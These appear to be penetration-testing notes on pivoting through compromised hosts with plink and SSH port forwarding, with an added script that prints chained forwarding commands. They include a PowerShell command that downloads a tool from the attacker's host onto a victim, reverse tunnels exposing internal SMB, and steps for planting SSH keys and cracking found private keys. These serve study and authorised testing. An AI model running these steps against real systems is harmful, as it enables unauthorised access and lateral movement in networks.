Tunneling / (with SSH key)

Burp > proxychains (SOCKS) > app: point Burp at the same SOCKS listener proxychains uses, under Settings > Network > Connections > SOCKS Proxy

sudo netstat -tulpn (or ss -tulpn) on kali to confirm the tunnel listener is actually bound, and on which address (127.0.0.1 vs 0.0.0.0)

#victim
netstat -ano #to find services that nmap missed: bound to 127.0.0.1 only, or filtered by the host firewall

#kali
python3 -m http.server 8080 #to host plink.exe
service ssh start

#victim
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://192.168.119.158:8080/plink.exe','C:/hfs/tmp/plink.exe')"

#echo y auto-accepts kali's host key; -N opens no shell, only the forward; -pw leaves the password visible in the process list (plink prompts if it is omitted)
cmd.exe /c echo y | plink.exe -ssh -N -l kali -pw kalipwd -R 192.168.119.158:7799:127.0.0.1:445 192.168.119.158

#kali
nmap -sT -sV -sC -p 7799 127.0.0.1 #scans the victim's internal :445 through the tunnel

:445 = service on the victim's loopback ; :7799 = listener on kali that the tunnel relays to the victim's :445 (unless sshd has GatewayPorts yes, the -R bind address is ignored and the listener lands on 127.0.0.1, so scan 127.0.0.1)

#machine C
plink.exe -ssh -l b.user -pw b.pwd -N -R 10.1.1.9:1069:127.0.0.1:9050 10.1.1.9

#machine B 10.1.1.9
plink.exe -ssh -l kali -pw kalipwd -N -R 192.168.119.158:7799:127.0.0.1:1069 192.168.119.158

tunneling machine C :9050 to kali :7799 through machine B :1069
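An added example, not part of the original notes and not plink's or OpenSSH's own code: it builds the per-hop reverse-forward command for a chain such as C > B > kali (the generalisation of the two plink lines above), checks on kali that the final listener came up and where it bound, and emits the restricted authorized_keys entry for the key the last hop uses to reach kali without a password (the "prevent ssh from asking for kali pwd" case further down). Hosts, users, ports, the sample `ss -tlnp` output and the public key are assumptions or constructed.

```shell
# Added example (not from the original notes). Hosts, users, ports and the
# sample ss output below are assumptions / constructed data.

# rforward_chain SERVICE_PORT NEXT_HOST:USER:BIND_PORT [NEXT_HOST:USER:BIND_PORT ...]
# Hops are listed innermost first: the first triple is the box the service host
# SSHes into, the last triple is the attacker box.  Each hop forwards the port
# the previous hop bound on it (127.0.0.1:<port>) one step closer to kali.
rforward_chain() {
    fwd_port=$1
    shift
    where="the host that owns 127.0.0.1:$fwd_port"
    for hop in "$@"; do
        next_host=${hop%%:*}
        rest=${hop#*:}
        user=${rest%%:*}
        bind_port=${rest#*:}
        printf '# run on %s\n' "$where"
        # -N: no shell, only the forward.  -pw is left out on purpose: plink will
        # prompt, so the password does not sit in cmd history or the process list.
        printf 'plink.exe -ssh -N -l %s -R %s:%s:127.0.0.1:%s %s\n' \
            "$user" "$next_host" "$bind_port" "$fwd_port" "$next_host"
        fwd_port=$bind_port
        where=$next_host
    done
}

# Constructed sample of `ss -tlnp` on the attacker box after the chain is up
# (not a real capture).  The listener is on 127.0.0.1 even though -R asked for
# 192.168.119.158: without GatewayPorts yes, sshd ignores the bind address.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    127.0.0.1:7799      0.0.0.0:*         users:(("sshd",pid=4242,fd=9))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=811,fd=3))'

# listener_pid PORT : reads ss -tlnp output on stdin, prints the PID holding the
# listener on PORT; exit 1 if nothing listens there (the tunnel never came up).
listener_pid() {
    awk -v port="$1" '
        $1 == "LISTEN" && $4 ~ (":" port "$") {
            if (match($6, /pid=[0-9]+/)) { print substr($6, RSTART + 4, RLENGTH - 4); found = 1 }
            exit
        }
        END { exit (found ? 0 : 1) }'
}

# listener_addr PORT : prints the address the listener on PORT is bound to, to
# tell a loopback-only tunnel from one exposed on every interface.
listener_addr() {
    awk -v port="$1" '
        $1 == "LISTEN" && $4 ~ (":" port "$") {
            sub(":" port "$", "", $4); print $4; found = 1; exit
        }
        END { exit (found ? 0 : 1) }'
}

# restricted_authorized_key PUBKEY_LINE FROM_IP LISTEN_PORT : entry for kali's
# ~/.ssh/authorized_keys for the key the last hop uses to come back to kali.
# restrict (OpenSSH >= 7.2) removes shell, pty, agent and X11 forwarding;
# port-forwarding plus permitlisten (>= 7.8) re-allow only the -R bind the
# tunnel needs, and from= pins the source host, so a key recovered from the
# pivot cannot be used for anything else against kali.
restricted_authorized_key() {
    printf 'restrict,port-forwarding,permitlisten="%s",from="%s" %s\n' "$3" "$2" "$1"
}

# Usage: the C -> B -> kali chain from the notes, then the checks you would run
# on kali as:  ss -tlnp | listener_pid 7799
rforward_chain 9050 10.1.1.9:b.user:1069 192.168.119.158:kali:7799
printf '%s\n' "$SAMPLE_SS" | listener_pid 7799     # 4242
printf '%s\n' "$SAMPLE_SS" | listener_addr 7799    # 127.0.0.1
# constructed public key, not a real one
restricted_authorized_key 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGNvbnN0cnVjdGVk pivot' 10.1.1.9 7799
```

The chain builder only prints commands; nothing is executed, so it can be run on kali before the engagement to sanity-check directions (each -R's 127.0.0.1:<port> must be the port the previous hop bound). `listener_pid` failing is the quickest way to tell a silently dropped forward (already-used port, AllowTcpForwarding no) from a tunnel that is up but bound to the wrong address.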

ssh to victim from kali

may use -i {private key} if a private key found on the target had its passphrase cracked (e.g. ssh2john + john)

or -i {kali's private key} after appending kali's public key to the victim's ~/.ssh/authorized_keys

local forward: kali :8888 through the pivot machine to the windows victim :3389 (RDP still needs the victim's credentials)

kali connects to 127.0.0.1:8888; the pivot machine relays it to the final victim's :3389

ssh from victim to kali

after finding, from the 1st victim, which port is open on the next host (reverse forward, like the plink -R above)

prevent ssh from asking for kali's pwd: put an id_rsa on the victim whose public key is in kali's authorized_keys, and restrict that entry (restrict,port-forwarding,permitlisten) so the key cannot open a shell on kali if it is recovered from the victim

dynamic port forwarding: ssh -D gives a SOCKS listener on kali; reach the pivot's networks through it with proxychains or Burp's SOCKS proxy setting

windows: allowing other hosts to reach a service that only listens on local :80
